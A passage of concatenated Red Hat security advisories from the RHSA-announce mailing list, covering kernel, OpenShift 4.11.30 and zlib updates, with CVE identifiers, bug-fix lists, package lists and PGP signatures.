A9VLOuK30khSAjZKaL3jKH9V48WAEXWoIY2ncfFPovw7v7Zyv6bPq2nEIjghvlEf  
9ymb60lfH/5wm29OLbmyOGc9eO0FK1qIcarjkI8Tb+PGsLDkocN+vDy7sbr48AlR  
ZGqLy7awTvdL1G9mFR1S9WMD62jSoHP/wKBwdCHb4cxOXkGjUBMrAnbOXkWU+vkf  
Q3Pc1a6PFkzgH+TjVNYXy6aOyeHZJxCEj/FDXHo/+QauTxx/xUmryxREFjzand7Z  
8TYxpRm78DHmBPmctht+ivZ6thfrcLqtq4xMkCQEUL4PI2pWuL94GiRI3l6e/Iil  
r77PJEmt1v4=fimS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1093-01

Red Hat Security Advisory 2023-1091-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:1091-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1091  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-4378 CVE-2022-42703  
====================================================================  
1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* kernel: use-after-free related to leaf anon_vma double reuse  
(CVE-2022-42703)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Regression - SAS3416 card works on RHEL 7.7 and below, does not work on  
RHEL 7.8 or 7.9 (BZ#1974485)

* use-after-free in sctp_do_8_2_transport_strike (BZ#2054037)

* RHEL7.9 - [Regression] Kernel test failed during CPU polarization test -  
lscpu, chcpu - LPAR (BZ#2071980)

* RHEL 7, block: Crash in blk_mq_rq_timed_out() when dereferencing NULL  
request->q pointer (BZ#2088029)

* qla2xxx: Qlogic double completion races during error handling are still  
not fixed and this will also  be a RHEL8+ exposure (BZ#2092105)

* kernel 3.10.0-1160.80.1.el7.x86_64 on Xeon E55xx crashes upon KVM startup  
(BZ#2143438)

* Guest's time jumped forward by 12 minutes _after_ live-migration  
completes (in 30 seconds) (BZ#2152838)

* RHEL7: target crashes if a malicious initiator sends a logout immediately  
after a login command (BZ#2154243)

* RHEL7.9 - LTP testcase creat09 fails related to 'CVE-2018-13405' and  
'CVE-2021-4037` (BZ#2159946)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2054037 - use-after-free in sctp_do_8_2_transport_strike [rhel-7.9.z]  
2133483 - CVE-2022-42703 kernel: use-after-free related to leaf anon_vma double reuse  
2143438 - kernel 3.10.0-1160.80.1.el7.x86_64 on Xeon E55xx crashes upon KVM startup [rhel-7.9.z]  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
kernel-3.10.0-1160.88.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1160.88.1.el7.noarch.rpm  
kernel-doc-3.10.0-1160.88.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1160.88.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
bpftool-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
kernel-3.10.0-1160.88.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1160.88.1.el7.noarch.rpm  
kernel-doc-3.10.0-1160.88.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1160.88.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
bpftool-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
kernel-3.10.0-1160.88.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1160.88.1.el7.noarch.rpm  
kernel-doc-3.10.0-1160.88.1.el7.noarch.rpm

ppc64:  
bpftool-3.10.0-1160.88.1.el7.ppc64.rpm  
bpftool-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-bootwrapper-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-debug-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-debug-devel-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-debuginfo-common-ppc64-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-devel-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-headers-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-tools-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-tools-libs-3.10.0-1160.88.1.el7.ppc64.rpm  
perf-3.10.0-1160.88.1.el7.ppc64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
python-perf-3.10.0-1160.88.1.el7.ppc64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm

ppc64le:  
bpftool-3.10.0-1160.88.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1160.88.1.el7.ppc64le.rpm  
perf-3.10.0-1160.88.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
python-perf-3.10.0-1160.88.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm

s390x:  
bpftool-3.10.0-1160.88.1.el7.s390x.rpm  
bpftool-debuginfo-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-debug-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-debug-devel-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-debuginfo-common-s390x-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-devel-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-headers-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-kdump-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-kdump-debuginfo-3.10.0-1160.88.1.el7.s390x.rpm  
kernel-kdump-devel-3.10.0-1160.88.1.el7.s390x.rpm  
perf-3.10.0-1160.88.1.el7.s390x.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.s390x.rpm  
python-perf-3.10.0-1160.88.1.el7.s390x.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.s390x.rpm

x86_64:  
bpftool-3.10.0-1160.88.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
bpftool-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-debuginfo-common-ppc64-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
kernel-tools-libs-devel-3.10.0-1160.88.1.el7.ppc64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.ppc64.rpm

ppc64le:  
bpftool-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1160.88.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
kernel-3.10.0-1160.88.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1160.88.1.el7.noarch.rpm  
kernel-doc-3.10.0-1160.88.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1160.88.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
bpftool-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1160.88.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1160.88.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuD9zjgjWX9erEAQjyZBAAkwsEIIDKLQkrNBmDpWdm38h5MGj42bke  
EvbbjabjOpQYA4r+7pahOwp+xVSPIVEsDcY9ita0pBf9F7mR7RioqqiKtKLcCak/  
T+Qk2vgfAmGuj3QAAxcMRp88xiFBx7EwwXtcU5ulciEsjDLMMx/DiAZPkkPgo5M9  
p1SrjC/qORcPKsGnG27iT/npSiaOTG6orNDzmi1a/WIVjhzLYOoMXIX3NjUpG+Gd  
4iRoEtJXCaVS5g3UtIj9NznFEon1k8HuclmAmDLjlVLhgzEmDcKr3pOBLAUyDXlv  
C6tWkzQjbRXI3USrBYCH69QGD4MsnONW1Odji+ZnQNaiLz9QxkFvZq4XdZ4AeLgT  
9Bli4GHvAkFoJnLCa17sc8R7y0pO6UOYuYiQhglunM09K71INTO7xHBEh23+nNeW  
zx3cG2kKZMehyJTEvc4CuNW4JKyTc3h4qEbq8K5we7JU43TLfxcGdfm1Csi5ydMZ  
X7bJPM8NfC15M+1EIj8TC8pgDEPC9tz1Y7VyeeISV0TH/yU52qRuMoOR741kwybQ  
03EiviBvEEy3g2UqV/050wawqSQuodIGtdngrcelp4km1inyv4vAr8KdL57qNeIM  
L732JrUbAflLZQZalYPVjO/9CqFESwUQ0Wd8oTbO9/CBiT0cS168WRLYOwF2RtHp  
fc2jpAMX+JQ=uGpq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1091-01

Red Hat Security Advisory 2023-1030-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.30.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.30 security update  
Advisory ID:       RHSA-2023:1030-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1030  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-41717  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.11.30 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.11.30. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2023:1029

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

      The sha values for the release are

      (For x86_64 architecture)  
The image digest is  
sha256:8230ca19fea80ef02f255a9f92688aa2639f68739a2b69114bf9af06080f9edc

      (For s390x architecture)  
The image digest is sha256:  
7fe1ffe6514c1eceeaacb49ea2319a1489b0a3d9a30cdd6fc39ab7cf3c94ce1c

      (For ppc64le architecture)  
The image digest is  
sha256:aae8c6ea3512a3bd625c1c7add0ff98d08d1ad1df30b6ecf367fb80bf3169051

      (For aarch64 architecture)  
The image digest is  
sha256:182556f517d6a488cab03468cc1f7d977f46628ec9106465fea36ce2ae358b4d

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-6834 - [release-4.11] Include openshift_apps_deploymentconfigs_strategy_total to recent_metrics  
OCPBUGS-7174 - [OVN] DHCP timeouts on Azure arm64, install fails  
OCPBUGS-7494 - Broken secret created while starting a Pipeline  
OCPBUGS-7526 - [4.11] Add new regions for ROSA  
OCPBUGS-7530 - [4.11] Bootimage bump tracker  
OCPBUGS-7814 - [release-4.11] [AWS EFS] NFS mount disconnects and becomes unavailable.  
OCPBUGS-7851 - Placeholder bug for OCP 4.11.0 rpm release

6. References:

https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuHtzjgjWX9erEAQib6w/+J+FUE0HbT3FdqdpdPp2tc8UJ0/yTkylb  
UozqlnWC3gUXL43tl+m5P0ZuOBxVSlU+dUVeRZvAJ/EtGesAT3fOvAgE71fWcPjf  
qduc6ugHoYmhy4cLT/zuMcpsWyX/jDX+9i/jt9qaU66mD8XRmfyEB7LlONslMXNa  
YIxtYVgavESgbGcLVpPvJEi3TsaajMtzbuoS7wVZ7QuHJKScm4Y6dYMzlkNG996f  
Vh36KiURCNurFEhpHoIzTu0XO0BKE9DaAJcYqMPXFHl1h7tnFFleGw8l+sAYpcSR  
AD02yLTZfqwru7lG09Glm4rqEtXUPYgPsyGqUV5scEYlXB2sg9KE7pN3HgdMUdX4  
AihAWc5/AvT+n5FqW8VGbTYSYKCG3kuyqf/bGxIRu+XJDfVREY+gqZx5CYk64PQB  
tU/boZrAGnEU7qLwuX4d/W0G7BVHIcmlFzHYXqtcArTVGoaGjVN3qM6wwqam0WBn  
6/q7TsMtv6tyWuR2RFW1yUYkTdsSMoiL2fHnzPpawFE5hgCGnHmXo5uM4pjY5A3E  
dnQ2Lpey5ckOt8KmVHg8b1EZJbPr8dHDZJoJ4FzwS08n3B/2HA4bcAyRYU+vXFC8  
KZbpNp8sR+Qv0xU0lpQ1u2w6UjGYdjcgs86NooChgrV1HvFRlCECoMSM85GWXO6x  
c8pKWwTnuWY=L02s  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1030-01

Red Hat Security Advisory 2023-1095-01 - The zlib packages provide a general-purpose lossless data compression library that is used by many different programs. Issues addressed include a buffer over-read vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: zlib security update  
Advisory ID:       RHSA-2023:1095-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1095  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-37434  
====================================================================  
1. Summary:

An update for zlib is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The zlib packages provide a general-purpose lossless data compression  
library that is used by many different programs.

Security Fix(es):

* zlib: heap-based buffer over-read and overflow in inflate() in inflate.c  
via a large gzip header extra field (CVE-2022-37434)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
zlib-1.2.7-21.el7_9.src.rpm

x86_64:  
zlib-1.2.7-21.el7_9.i686.rpm  
zlib-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
minizip-1.2.7-21.el7_9.i686.rpm  
minizip-1.2.7-21.el7_9.x86_64.rpm  
minizip-devel-1.2.7-21.el7_9.i686.rpm  
minizip-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-devel-1.2.7-21.el7_9.i686.rpm  
zlib-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-static-1.2.7-21.el7_9.i686.rpm  
zlib-static-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
zlib-1.2.7-21.el7_9.src.rpm

x86_64:  
zlib-1.2.7-21.el7_9.i686.rpm  
zlib-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
minizip-1.2.7-21.el7_9.i686.rpm  
minizip-1.2.7-21.el7_9.x86_64.rpm  
minizip-devel-1.2.7-21.el7_9.i686.rpm  
minizip-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.i686.rpm  
zlib-debuginfo-1.2.7-21.el7_9.x86_64.rpm  
zlib-devel-1.2.7-21.el7_9.i686.rpm  
zlib-devel-1.2.7-21.el7_9.x86_64.rpm  
zlib-static-1.2.7-21.el7_9.i686.rpm  
zlib-static-1.2.7-21.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
zlib-1.2.7-21.el7_9.src.rpm

ppc64:  
zlib-1.2.7-21.el7_9.ppc.rpm  
zlib-1.2.7-21.el7_9.ppc64.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc64.rpm  
zlib-devel-1.2.7-21.el7_9.ppc.rpm  
zlib-devel-1.2.7-21.el7_9.ppc64.rpm

ppc64le:  
zlib-1.2.7-21.el7_9.ppc64le.rpm  
zlib-debuginfo-1.2.7-21.el7_9.ppc64le.rpm  
zlib-devel-1.2.7-21.el7_9.ppc64le.rpm

s390x:  
zlib-1.2.7-21.el7_9.s390.rpm  
zlib-1.2.7-21.el7_9.s390x.rpm  
zlib-debuginfo-1.2.7-21.el7_9.s390.rpm  
zlib-debuginfo-1.2.7-21.el7_9.s390x.rpm  
